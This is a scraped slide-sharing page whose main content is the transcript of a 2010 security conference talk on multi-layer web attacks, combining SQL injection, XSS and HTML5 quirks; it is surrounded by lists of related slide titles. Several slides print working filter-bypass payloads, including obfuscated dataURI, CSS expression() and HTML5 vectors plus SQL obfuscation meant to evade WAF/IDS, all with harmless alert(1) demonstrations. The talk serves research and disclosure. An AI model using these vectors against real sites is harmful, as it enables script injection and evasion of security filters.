2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIAguestfdcb8a
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS UniverseStefano Di Paola
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines José Ignacio
 
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing ItYou Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing ItAleksandr Yampolskiy
 
The Wondrous Curse of Interoperability
The Wondrous Curse of InteroperabilityThe Wondrous Curse of Interoperability
The Wondrous Curse of InteroperabilitySteve Loughran
 
NoSQL - No Security?
NoSQL - No Security?NoSQL - No Security?
NoSQL - No Security?Gavin Holt
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
CVE 2012-1889 Microsoft XML core services uninitialized memory vulnerability
CVE 2012-1889 Microsoft XML core services uninitialized memory vulnerabilityCVE 2012-1889 Microsoft XML core services uninitialized memory vulnerability
CVE 2012-1889 Microsoft XML core services uninitialized memory vulnerabilityHigh-Tech Bridge SA (HTBridge)
 
Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019
Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019
Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019Icinga
 
MunichJS - 2011-04-06
MunichJS - 2011-04-06MunichJS - 2011-04-06
MunichJS - 2011-04-06Mike West
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientAngelo Dell'Aera
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜Yuki Okada
 
Original slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talkOriginal slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talkAarti Parikh
 
Real World Single Page App - A Knockout Case Study
Real World Single Page App - A Knockout Case StudyReal World Single Page App - A Knockout Case Study
Real World Single Page App - A Knockout Case Studyhousecor
 

Ähnlich wie Future of Web Attacks: Multi-Layer Attacks, XSSQLI+ and HTML5 (20)

Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines
 
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing ItYou Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
You Too Can Be a Radio Host Or How We Scaled a .NET Startup And Had Fun Doing It
 
The Wondrous Curse of Interoperability
The Wondrous Curse of InteroperabilityThe Wondrous Curse of Interoperability
The Wondrous Curse of Interoperability
 
NoSQL - No Security?
NoSQL - No Security?NoSQL - No Security?
NoSQL - No Security?
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
CVE 2012-1889 Microsoft XML core services uninitialized memory vulnerability
CVE 2012-1889 Microsoft XML core services uninitialized memory vulnerabilityCVE 2012-1889 Microsoft XML core services uninitialized memory vulnerability
CVE 2012-1889 Microsoft XML core services uninitialized memory vulnerability
 
Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019
Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019
Icinga Director and vSphereDB - how they play together - Icinga Camp Zurich 2019
 
MunichJS - 2011-04-06
MunichJS - 2011-04-06MunichJS - 2011-04-06
MunichJS - 2011-04-06
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜
Web開発の技術選び、 好き嫌いでやってませんか 〜技術選びで注目すべきポイントとは〜
 
Original slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talkOriginal slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talk
 
Real World Single Page App - A Knockout Case Study
Real World Single Page App - A Knockout Case StudyReal World Single Page App - A Knockout Case Study
Real World Single Page App - A Knockout Case Study
 

Kürzlich hochgeladen

Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...amber724300
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesManik S Magar
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
Accelerating Enterprise Software Engineering with Platformless
Accelerating Enterprise Software Engineering with PlatformlessAccelerating Enterprise Software Engineering with Platformless
Accelerating Enterprise Software Engineering with PlatformlessWSO2
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Alkin Tezuysal
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...Nikki Chapple
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...Karmanjay Verma
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 

Kürzlich hochgeladen (20)

Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
Accelerating Enterprise Software Engineering with Platformless
Accelerating Enterprise Software Engineering with PlatformlessAccelerating Enterprise Software Engineering with Platformless
Accelerating Enterprise Software Engineering with Platformless
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 

Future of Web Attacks: Multi-Layer Attacks, XSSQLI+ and HTML5

  • 1. The Presence and Future of Web Attacks Multi-Layer Attacks, XSSQLI+ and HTML5 A presentation by Mario Heiderich for CONFidence 2010, Krakow
  • 2. WARNING This talk will be technical, chaotic and|or hurt
  • 3. Intro Mario Heiderich @0x6D6172696F  Based in Cologne  CTO for Business IN Inc - working on workube.com  Independent Security Researcher  PHPIDS and something we will see later on
  • 4. Why this talk?  What happened to web application security?  Always the same... so 2002 right?  XSS, SQL Injections, Auth and path traversal  We have amazing things now!  NoScript, the IE8 and Chromium XSS filter and CSP  Users must be safer than ever!  But didn't the web change?  Wasn't there HTML5 and next generation browsers?
  • 5. Oh wait - developers!  Web app development frameworks help  Building applications faster  Pre-implemented SQLI and XSS protection  Secure forms with complex CSRF tokens  Webroot contains webroot only files  Weaknesses regarding JavaScript generation  Client side logic mostly built manually  Different templates for browsers, mobile devices, feeds  Offline mode, client side validation, DOM access
  • 6. User Agents on steroids  Chrome 5 and Opera 10.5 ship client side databases  IE9 is coming soon with more standards conformity  Integrated security mechanisms  The death of eval()  A fat client dynasty is coming up  Who needs a server anyway if clients do all the work  And store their data in „the cloud“   Bye bye SQL - say hello to NoSQL?
  • 7. Web applications are changing  And so are the attacks against them  If the attack happens on and against the client  Of what use will a server side IDS / WAF solution be?  Today we can have a little preview for that scenario  One question might be...  How will protective mechanisms react on multi-layer attacks?
  • 8. Multi-layer what?  What about utilizing the DBMS to generate an XSS attack  NoScript detects most XSS attacks without problems  Circumvention has become very difficult  Thanks to Giorgio Maone and the NoScript user base. And me :P  Let's have a look at my last one (disclosed via SSD - fixed in 1.9.9.48)  Aren't dataURIs the sweetest thing?  <a href="d&#097t&#x0061: . &#x2c &#x25;  3  c s cri &#x00D; pt % 3 e alu0065rt(1)%3c  /s &#x43 RI &#x009 P t>"
  • 9. Difficult!  We can probably agree that it's not as easy anymore  Same thing for the IE8 XSS filter  Or implementations of toStaticHTML()  Most quirky JavaScript encoding techniques are documented  Not too many user agent specific surprises anymore    Help from another layer would be appreciated  Let's have a look at a "classic webapp" example
  • 10. Imagine the DBMS helps  Hypothesis  A verbose SQL Injection vulnerability is always at least an "unfilterable" XSS  Verification  Just make use of the obfuscation possibilities the DBMS provides  SELECT 0x3C7363726970743E616C6572742831293C2F7363726970743E  SELECT UpdateXML(concat( 0x3c,'script',0x3e,'alert(1)',0x3c,'/ script',0x3e), '/x', 0);  SELECT/**/'<sc'"rip"'t>al'"er"'t(1)'"</sc"'ript>'
  • 11. MySQL and PostgreSQL  MySQL only ships two basic XML functions  UpdateXML() and ExtractValue()  PostgreSQL has far more advanced XML support  SELECT xmlelement(name img,xmlattributes(1 as src,'alert(1)'as onerror))  SELECT xmlforest(loWER('x41'||'lert(1)') AS script);  And my favorite  SELECT xpath('//text()', '<x:x>&#x3c;imgx20src=x onerror=alert(1);&#x2f;&#x2f;</x:x>', ARRAY[ARRAY['x', '']]);
  • 12. SQL Injection and XSS  There are more intersections for XSS and SQLI  „Remember“ the client side databases?  And the short lived Google Gears?  HTML5 and W3C Offline Web Applications 1.0 give us window.openDatabase()  SQL execution on the user agent  Currently supported by Chrome and Opera  Usually implemented using SQLite
  • 13. Code please <script type="text/javascript"> openDatabase('',1,1,0).transaction(function($){ $.executeSql( 'SELECT "x61lert(1u0029"', [], function($,results){ for(i in results.rows.item(0)) eval(results.rows.item(0)[i]) }) }) </script>  Selects the string "alert(1)"  And evaluates the result
  • 14. Short Roundup  The browsers speak SQL now  The server side DBMS can generate HTML and JavaScript  We already outsmarted NoScript and IE8 XSS filter  Not really a fair game though  Multi-layer attacks mean multi-layer obfuscation  In future webapps the client side DBMS will generate our XSS payload     But today we still have to trick the server side protection  Bypass IDS and WAF with a trigger
  • 15. Attackers like obfuscation  And why wouldn't they - right?  Obfuscation usually means concatenation  And a bit of encoding spice  But how to concatenate in SQL so no one will notice the attack?  Which operator to choose?  Everybody knows chr(), char() and double-pipe...
  • 16. In MySQL - none at all  MySQL doesn't need parenthesis to concatenate  And doesn't know the double-pipe operator  Sorry mod_security...  But luckily MySQL accepts concatenation via whitespace  SELECT "a" "d" "m" "i" "n"  SELECT'a'"d"'m'"i"'n'  Or why not use an integer overflow in char()  SELECT concat( char( x'70617373', b'1110111011011110111001001100100'))
  • 17. So again...  We can bypass the server side protection mechanisms  As well as client side tools  No parenthesis or special operators needed on MySQL  We can also trick MySQL and the IDS with MySQL specific code  SELECT--/*!500005,*//*!400004,*//*!300003,*/
  • 18. Back to the user agent  But what if no server side DBMS is involved in the attack  What if the client side database is being targeted  We still need to execute some JavaScript bypassing either server side IDS and the client side security mechanisms  Let's have a look at some freaky examples
  • 19. Remember dataURIs?  The whole requested resource embedded in the URI  DataURIs work smoothly on Firefox, Opera and Chrome  But IE8 and 9 have problems  Some say the minimal dataURI support was just for ACID 2
  • 20. People say...  ...it's not possible to execute JavaScript via dataURI on IE  Do we agree on that?  No we don't!  <style> @import "data:,*%7bx:expression(write(2))%7D"; </style>  <link rel="Stylesheet" href="data:,* %7bx:expression(write(4))%7d">
  • 21. And there's more  CSS expression() is believed to be dead on IE8  But it isn't  It's only disabled in standard mode  In case a recognized DOCTYPE is present  The new HTML5 doctype isn't  So this works: <!docytpe html> <div style="background:url('abc', x!=x=expression(write(2));)">
  • 22. And even worse...  HTML5 forces user agents to be more tolerant again  New tags, new attributes, new parsing rules  And tons of new features like the mentioned openDatabase()  Some nifty examples from the future  <video/poster=javascript:alert(1)// Opera 10.5+  <style>@import javascript:alert(1); // IE9 (!)
  • 23. Closing tags + free 0day  Another weird artifact has been reported for IE6 some years ago  It's attributes in closing HTML tags  Believed to be dead... but  This still works on all IEs  <td>phoobar</td style=expression(write(1))>  And what about this?  <style>*{background:url(foo!!- =expression(write(1));</style>
  • 24. Opera CSS XSS  Since Mozilla fixed the dataURI and cross domain problems with -moz-binding IE was believed to be unique  Unique regarding JavaScript execution via CSS  But Opera ships an artifact too  <style>*{-o-link:'javascript:alert(1)';-o-link- source:current}</style>
  • 25. Now we have...  Server side SQL helping to circumvent client side XSS filters  Effective SQL obfuscation circumventing WAF and IDS  "Obfuscation-mash ups" using several layers  Quirky HTML triggers to execute the JS  Sounds like only one player is missing  Even more freaky markup obfuscation! Awesome! Now breathe..
  • 26. Meet Harold the markup ghoul This is Harold: 1;--<?f><l ₩ :!!:x /style=`b&#x5c;65h0061vIor/ĸ :url(#def&#x61ult#time2)ö/';'` ₩ /onb egin= &#x5bµ=u00&#054;1le&#114t&#40&#x31)&# x5d&#x2f/&#xyŧ>  It's completely legitimate to call me a mad man now and say this is never gonna work  So - demo time: http://heideri.ch/jso/what???
  • 27. What... what is this?  It's a piece of markup – obfuscated to the max  Working on IE only – but all versions from 5 to 9  Based on the HTML+TIME API (What? Stuff like that still exists?)  Does your WAF know what to do with it?  Overall about 12-13 obfuscation steps  Buy me a beer later on and I will give you a full explanation :D
  • 28. Round Up  We are not living in web app = CRUD application times anymore  Modern webapps accept input from many channels  User input via HTTP is just one of them  API calls, RPC, DOM, Drag&Drop, file meta data & EXIF...  WAF/IDS as well as pentesters need to look into HTML5  New application structures and design pattern must be understood  Client and server versus rich-client and cloud  SQLite and NVP versus RDBMS  Massive client diversity via mobile devices
  • 29. Expectations and tasks  Fewer basic and reflective XSS  More out-of-band attacks and heavy obfuscation  We didn't even cover Flash and PDF  More JSON and E4X hijacking  SVG based attacks and rogue multimedia objects  Don't ignore the user agent  Understand client side obfuscation and multi-layer obfuscation  Don't trust filters. Ever.  We broke HTMLPurifier and most other markup filters some days ago with one single vector  And don't trust the cloud – it's a business model and not your buddy :D
  • 30. So what can I do?  Help with research and participation!  Communication and disclosure  For good!  But how?
  • 31. The Ultimate Cheatsheet  http://heideri.ch/jso
  • 32. Ping us!  Add new vectors  Get a channel to speak to vendors  Most are more responsive than one might think  Use it for..  Your own scanner software  Your own local version  Whatever you want!  Open API in JSON  Multiple languages  Flexible payload  You need more? Tell us!
  • 33. Do what now?  Go here!  http://code.google.com/p/html5security/
  • 34. Questions & Comments  Thanks very much for listening!  Wait - no goodies this time? Meh!!1
  • 35. Yaaaaaaay! Goodies!  Did you know Firefox has a DOM object called crypto?  PKI meets JavaScript  And another eval() for free!  crypto.generateCRMFRequest( 'CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use' );